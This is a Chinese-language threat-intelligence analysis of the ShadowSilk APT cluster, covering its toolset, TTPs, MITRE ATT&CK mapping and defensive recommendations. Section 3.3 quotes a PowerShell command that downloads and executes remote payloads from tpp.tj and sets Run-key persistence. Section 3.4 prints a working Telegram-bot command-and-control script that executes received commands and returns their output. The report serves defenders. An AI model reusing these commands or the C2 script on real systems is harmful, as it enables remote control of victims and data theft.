摘要

本報告針對 ShadowSilk threat cluster 進行了全面的技術分析,該 cluster 是一個以資料外洩為主要目的的複雜且具備持久性的 Threat actor。本文件利用公開的威脅情資以及對已識別的惡意軟體元件進行深入分析,詳細介紹了 ShadowSilk 的作業方法、工具集和戰術、技術與程序(Tactics, Techniques, and Procedures, TTPs)。報告特別關注其客製化 web panels 和基於 PowerShell 的 command and control 機制的技術層面,並使用 Mermaid 圖表進行視覺化呈現。本報告旨在提供對此一不斷演變的威脅更深入的了解,並為應對類似的進階持續性威脅提供防禦策略的參考。

深藏不露的 ShadowSilk:從其客製化 C2 Web Panels 揭示進階持續性威脅的最新樣貌 | 資訊安全新聞

1. 簡介

在不斷演變的網路威脅環境中,進階持續性威脅(Advanced Persistent Threat, APT)團體因其複雜的方法、持續的運作和適應性而帶來巨大的挑戰。ShadowSilk threat cluster 最初於 2024 年底被發現,展現出這些特徵,其明確的目標是從目標組織中竊取資料。該組織的攻擊自 2023 年以來持續進行,並在 2025 年年中更新了基礎設施並擴大了受害者範圍 [1]。

對 ShadowSilk 的初步調查發現其與先前記錄的 YoroTrooper threat actor 有顯著的重疊之處,這表明兩者之間可能存在演變或密切合作關係。本報告深入探討了 ShadowSilk 行動背後的技術基礎,從高階觀察轉向剖析所採用的特定工具和技術。透過分析技術 Artifact,例如 PowerShell 腳本和其客製化 web panels 的描述,本研究旨在提供對 ShadowSilk 運作能力及其與 MITRE ATT&CK 等既定網路資安框架對應關係的詳細了解。

本報告後續章節將詳細介紹與 ShadowSilk 攻擊相關的重要發現,分析其工具和 exploits,並對其 TTPs 進行深入檢查。此外,報告將加入視覺輔助,特別是 Mermaid 圖表,以說明其惡意腳本的功能流程。目標是呈現一個強而有力的技術概述,以幫助開發針對此一持續性威脅更有效的檢測和緩解策略。

2. 主要發現

ShadowSilk 自 2023 年以來一直保持著持續的運作狀態,其攻擊一直延續到 2025 年年中。此 threat group 的主要目標是竊取敏感資料,主要來自政府組織。已確認超過 35 個不同的受害者實體,主要來自政府部門,這凸顯了 ShadowSilk 攻擊的針對性 [1]。

對 ShadowSilk 的分析中一個關鍵發現是,它與 YoroTrooper(一個已知的以網路間諜為重點的 threat actor)在基礎設施和工具集方面有很強的共通性 [5, 6]。這種關聯表明 YoroTrooper 可能直接演變成了 ShadowSilk,或者兩個獨立的子群體之間存在著密切的合作關係。據信該組織至少有兩個不同的子群體,其特徵是使用中文和俄文的operators,儘管他們合作的確切性質和程度仍在持續研究中 [1]。

ShadowSilk 的操作工具包是多樣化的,涵蓋了公開可用的攻擊方法、商業滲透測試工具和專有的 web panels。這些客製化 web panels 尤其值得注意,因為它們並非公開可用,據信是由該組織自行開發或透過暗網管道取得 [1]。歸因於 ShadowSilk 的被竊取資料出現在暗網論壇上,進一步凸顯了該組織將被入侵資訊變現或加以利用的意圖和能力。

3. ShadowSilk 的武器庫 - 工具集和攻擊方法

ShadowSilk 採用多面向的工具和攻擊武器庫來實現其目標,範圍從現成的滲透測試工具到客製化開發的惡意軟體和 web panels。本節將詳細介紹其操作工具包的關鍵元件。

3.1 客製化開發的 Web Panels

ShadowSilk 行動的核心是其客製化開發的 web panels。這些 panels 作為 command and control (C2) 基礎設施,使攻擊者能夠管理受感染的裝置、竊取資料和遠端發出指令。這些 panels 的專有性質(不公開可用)表明他們在開發或透過非法手段(例如暗網論壇)取得方面投入了大量資金 [1]。儘管無法直接分析 web panel 的原始碼,但其描述的功能意味著它是一個複雜的介面,用於任務管理、檔案瀏覽、命令執行和資料竊取。

3.2 惡意軟體分析

ShadowSilk 利用各種惡意軟體,每種都為其攻擊鏈的特定階段量身定製。這包括:

  • Loaders: 專門用於初始傳播和執行後續的 malicious payloads。
  • Backdoors: 為受入侵的系統提供持久的遠端存取,方便長期控制和資料提取。
  • Info-stealers: 專門用於竊取敏感資訊,包括 Credentials、財務資料和個人檔案。
  • Web shells: 部署在被入侵的網頁伺服器上,以維持持久性存取並啟用遠端命令執行 [1]。

3.3 基於 PowerShell 的 Payload 傳遞和持久性

ShadowSilk 初始存取和持久性機制的一個顯著方面是使用 PowerShell 腳本。Group-IB 調查中發現的一個此類腳本展示了一種多階段的 Payload 傳遞和持久性技術。該腳本旨在從遠端伺服器下載並執行額外的惡意元件,並透過修改登錄檔 key 來在被入侵的系統上建立持久性。以下 PowerShell 片段說明了這種行為: 

powershell -c  "(Invoke-WebRequest https://tpp.tj/BossMaster.txt | iex" REG ADD   
 HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsTaskPath /t   
 REG_SZ /d 'powershell -ExecutionPolicy Bypass -command "  
(iwr https://tpp.tj/iap.txt).Content | iex"' /f /run reg query HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

該腳本首先下載並執行 BossMaster.txt ,然後執行 iap.txt ,兩者都託管在 tpp.tj 上。使用 Invoke-WebRequest iex (Invoke-Expression) 允許直接執行遠端內容。持久性是透過在 Run 登錄檔 key 中新增一個名為 WindowsTaskPath 的新項目來實現的,確保每次使用者登入時都會執行 iap.txt Payload。末尾的 reg query 命令表明這是一種驗證持久性是否成功建立的機制 [1]。

這個 PowerShell 腳本的運作流程可以視覺化如下:

graph LR A[Start] --> B{Download
BossMaster.txt}; B --> C{Execute
BossMaster.txt}; C --> D{Download
iap.txt}; D --> E{Execute
iap.txt}; E --> F{Add
Registry Key
for Persistence}; F --> G{Query
Registry Key}; G --> H[End];

圖 1:ShadowSilk 的 PowerShell Payload 下載器運作流程。

3.4 基於 Telegram 的 Command and Control (C2)

對 ShadowSilk 基礎設施的進一步分析發現了其某個受入侵伺服器上的一個 PowerShell 腳本 gramm.ps1 。該腳本特別重要,因為它表明該組織使用 Telegram 通訊平台進行 command and control (C2) 通訊。該腳本與 Telegram bot API 互動以接收命令並回傳執行結果,這展示了一個隱蔽且隨時可用的 C2 管道。以下是該腳本的編輯後版本: 

  1. $Token="{redacted}"
  2. $URL="https://api.telegram.org/bot{0}" -f $Token
  3. $lastID = {redacted}
  5. while ($true) {
  6.     # Xabarlarni o'qish (Read messages)
  7.     $inMessage=Invoke-RestMethod -Method Get -Uri ($URL +'/getUpdates?offset=' + ($lastID + 1)) -ErrorAction Stop
  8.     $inMessage.result | ForEach-Object {
  9.         $updateid = $_.update_id
  10.         $from = $_.message.from.id
  11.         $command = $_.message.text
  12.         $OFS=''
  13.         # Cmd-da buyruqlarni bajarish uchun (To execute commands in Cmd)
  14.         if([string]$command[0..3] -eq "/cmd"){
  15.             $command = [string]$command[5..$command.Length]            
  16.             $result = Invoke-Expression($command)
  17.             $res = ""
  18.             $result | ForEach-Object {$res += [string]$_ + "%0D%0A"}
  20.             if($res -eq ""){
  21.                 $lastID = $updateid
  22.                 continue
  23.             }
  24.             if($res.Length -gt 4095){
  25.                 for ($i = 0; $i -lt $res.Length / 4095; $i++) {
  26.                     $begin = $i * 4095
  27.                     $end = $begin + 4094
  28.                     if($end -gt $res.Length){
  29.                         $end = $res.Length
  30.                     }
  31.                     $data = "chat_id=$from&text=" + $res[$begin..$end]
  32.                     $URI = "$URL/sendMessage?$data"
  33.                     Invoke-WebRequest -Uri $URI > $null
  34.                 }
  35.             } else {
  36.                 $data = "chat_id=$from&text=$res" 
  37.                 $URI = "$URL/sendMessage?$data"
  38.                 Invoke-WebRequest -Uri $URI > $null
  39.             }
  40.         }
  41.     }
  42. }

該腳本在一個持續的迴圈中運作,定期從 Telegram bot API 取得更新。它解析傳入的訊息,特別尋找以 /cmd 作為前綴的命令。收到此類命令後,它會提取命令字串,使用 Invoke-Expression 執行,然後格式化輸出。輸出隨後透過 Telegram 傳回給攻擊者,如果輸出超過 Telegram 的訊息長度限制,則將其分割成多個訊息。這種機制利用一個合法的通訊平台,提供了一個強大且隱蔽的遠端執行和資料竊取管道,以逃避檢測 [1]。

透過 Telegram 的 C2 通訊流程可表示如下:

graph LR A[Start] --> B{Initialize
Telegram
Bot API}; B --> C{Loop:
Get Updates
from
Telegram}; C --> D{Parse
Incoming
Message}; D{Is command
'/cmd'?} -- Yes --> E{Extract
Command}; E --> F{Execute
Command
Locally}; F --> G{Format
Results}; G{Result
Length
>
4095?} -- Yes --> H{Split
and
Send
in Chunks}; G{Result
Length
>
4095?} -- No --> I{Send Result
via
Telegram}; D{Is command
'/cmd'?} -- No --> C; H --> C; I --> C;

圖 2:基於 Telegram 的 Command and Control (C2) 通訊流程。

4. 戰術、技術與程序 (TTPs)

ShadowSilk 的 TTPs 展示了系統性地入侵和竊取目標網路資料的方法。他們的操作方法與既定的攻擊框架,特別是 MITRE ATT&CK 框架,密切相關,該框架為攻擊者行為提供了標準化的分類。該組織的 TTPs 的特點是注重隱蔽性、持久性和高效的資料外洩 [1]。

4.1 初始存取與執行

ShadowSilk 主要透過利用已知的軟體和系統漏洞,或透過魚叉式網路釣魚攻擊來獲得初始存取權。一旦建立初始存取,惡意程式碼就會在被入侵的系統上執行。這通常涉及使用 PowerShell 腳本,如第 3.3 節所述,以下載並執行更多 payloads,確保在目標環境中佔有一席之地。

4.2 持久性與權限提升

為了維持對被入侵系統的存取,ShadowSilk 採用了多種持久性機制,包括修改登錄檔 key 和部署 backdoors 和 web shells。這些技術讓攻擊者即使在系統重啟或安全干預後也能重新建立控制。權限提升是其行動中的關鍵步驟,使其能夠獲得更高層級的存取權,這是更廣泛的網路入侵和資料收集所必需的。

4.3 防禦規避與 Credentials 存取

ShadowSilk 利用技術來規避安全軟體和分析師的檢測。這包括使用像 Telegram 這樣的合法通訊管道進行 C2(如第 3.4 節所述),以及可能對其 malicious payloads 進行混淆或加密。Credentials 存取是一個關鍵目標,因為竊取的 Credentials 有助於在網路中進行橫向移動,並存取敏感資料和系統。

4.4 探索與橫向移動

一旦獲得存取權,ShadowSilk 會對被入侵的網路進行廣泛的偵察。這個探索階段包括識別有價值的資料、關鍵系統和網路拓撲。他們採用系統資訊探索、程序探索以及檔案和目錄探索等技術。在探索之後,進行橫向移動以存取額外的系統並擴大其在網路中的控制範圍,通常是利用竊取的 Credentials 或內部漏洞。

4.5 收集與竊取

ShadowSilk 的最終目標是資料竊取。敏感資料從被入侵的系統中收集,這可能包括智慧財產權、財務記錄、個人可識別資訊和政府機密。這些收集到的資料隨後透過其建立的 C2 管道(例如基於 Telegram 的 C2 或其客製化 web panels)傳輸到目標網路之外。該組織專注於資料竊取,這突顯了強大資料外洩防護(DLP)策略的重要性。

4.6 Command and Control

ShadowSilk 透過各種 command and control 機制與被入侵的系統保持通訊。如第 3.4 節所強調,使用 Telegram Bot API 進行 C2 提供了一個彈性且難以檢測的管道。他們的客製化 web panels 也作為主要的 C2 介面,允許直接管理受感染的裝置和資料外洩。從他們在公開揭露後仍能建立新基礎設施的能力可以看出,其 C2 基礎設施的適應性是此 threat group 的一個重要特徵。

4.7 MITRE ATT&CK 對應

ShadowSilk 的 TTPs 可以對應到 MITRE ATT&CK 框架,提供對其攻擊者行為的結構化理解。關鍵對應包括:

  • 主動掃描 (T1595): 用於偵察以識別脆弱系統。
  • 收集受害者網路資訊 (T1590): 收集目標網路的資訊,包括 IP 位址 (T1590.005)。
  • 利用客戶端執行 (T1203): 利用客戶端漏洞來執行惡意程式碼。
  • 魚叉式網路釣魚附件 (T1566.001): 透過有針對性的電子郵件附件傳遞惡意軟體。
  • 有效帳號 (T1078): 使用竊取或合法的 Credentials 存取系統。
  • 系統資訊探索 (T1082): 收集有關作業系統和硬體的詳細資訊。
  • 程序探索 (T1057): 識別系統上正在執行的 程序。
  • 檔案與目錄探索 (T1083): 尋找感興趣的檔案和目錄。
  • 遠端服務 (T1021): 存取網路上的遠端服務。
  • 資料竊取 (T1041): 透過 C2 管道竊取資料 [1]。

這個對應關係為理解 ShadowSilk 的操作模式提供了清晰的框架,並有助於開發有針對性的防禦措施。

5. 建議

為了有效緩解 ShadowSilk 和類似進階持續性威脅所帶來的風險,組織應實施全面的網路安全策略,包括以下建議:

  • 加強身份驗證和存取控制: 在所有系統和服務中實施多重身份驗證(MFA),以顯著降低 Credentials 被盜和未經授權存取的風險。定期審查並強制執行所有使用者帳戶的最小權限原則。
  • 漏洞管理與修補: 建立強大的漏洞管理程序,以迅速識別和修復安全弱點。確保所有軟體、作業系統和網路設備都定期更新,以應對像 ShadowSilk 這樣 threat actors 經常利用的已知漏洞。
  • 網路分段: 將網路分段為更小、更獨立的區域,以限制攻擊者在發生入侵時的橫向移動。這種隔離策略可以顯著降低成功入侵的影響。
  • 進階端點檢測與回應 (EDR): 部署並持續監控 EDR 解決方案,以即時檢測和回應端點上的可疑活動。EDR 能力對於識別與複雜攻擊相關的微小入侵指標至關重要。
  • 安全意識訓練: 為所有員工進行定期和全面的安全意識訓練,重點關注常見的攻擊媒介,例如魚叉式網路釣魚、社交工程,以及舉報可疑活動的重要性。一支受過良好訓練的員工隊伍是至關重要的防線。
  • 威脅情資整合: 積極參與威脅情資共享計畫,並將相關的威脅情資 feeds 整合到安全操作中。隨時了解新興威脅、TTPs 和入侵指標 (Indicators Of Compromise, IOCs) 有助於主動防禦和更快的應變時間。
  • 事件應變計劃與測試: 制定並定期測試詳細的事件應變計劃。這包括定義角色和職責、通訊協議以及用於遏制、根除和從安全事件中恢復的技術程序。定期演練和模擬對於確保計劃的有效性至關重要。
  • 資料外洩防護 (DLP): 實施 DLP 解決方案,以監控、檢測和阻止敏感資料外洩的嘗試。鑑於 ShadowSilk 的主要目標是竊取資料,強大的 DLP 措施對於保護敏感資訊至關重要。

透過採納這些建議,組織可以顯著增強其對抗像 ShadowSilk 這樣複雜 threat actors 的應變能力,並更好地保護其關鍵資產免受資料外洩和其他惡意攻擊的侵害。

6. 結論

ShadowSilk threat cluster 代表著一個高度持久且適應性強的攻擊者,其明確的重點是從目標組織竊取資料。他們即使在公開揭露後仍能快速建立新基礎設施並繼續運作的能力,凸顯了他們對網路安全構成的重大挑戰。觀察到的與 YoroTrooper threat actor 的重疊之處表明其操作結構複雜且可能正在演變,同時利用客製化開發的工具和現成的攻擊方法。

對其基於 PowerShell 的 Payload 傳播和基於 Telegram 的 C2 機制進行的技術分析,凸顯了他們利用合法平台進行惡意目的的獨創性,從而增加了檢測和緩解的難度。他們遵循一套明確定義的 TTPs,這些 TTPs 可以對應到 MITRE ATT&CK 框架,為尋求了解和反擊其行動的防禦者提供了寶貴的見解。他們攻擊的持續性質以及對資料竊取的執著追求,需要採取主動和多層次的防禦策略。

7. 參考文章

  1. ShadowSilk: A Cross-Border Binary Union for Data Exfiltration
  2. ShadowSilk Hits 35 Organizations in Central Asia and APAC Using Telegram Bots
  3. ShadowSilk Campaign Targets Central Asian Governments
  4. Sweeping ShadowSilk attacks target Central Asia, Asia-Pacific
  5. ShadowSilk Targets Penetration-Testing Tools and Public Exploits to Breach Organizations
  6. Kazakhstan-associated YoroTrooper disguises origin of attacks as Azerbaijan
  7. Talos uncovers espionage campaigns targeting CIS countries, embassies and EU health care agency
  8. YoroTrooper Threat Group Targets Commonwealth of Independent States Countries and Embassies
  9. Talos finds YoroTrooper malware executing espionage attacks against CIS countries, Turkey, European institutions
  10. ShadowSilk, a cross-border threat cluster with roots in YoroTrooper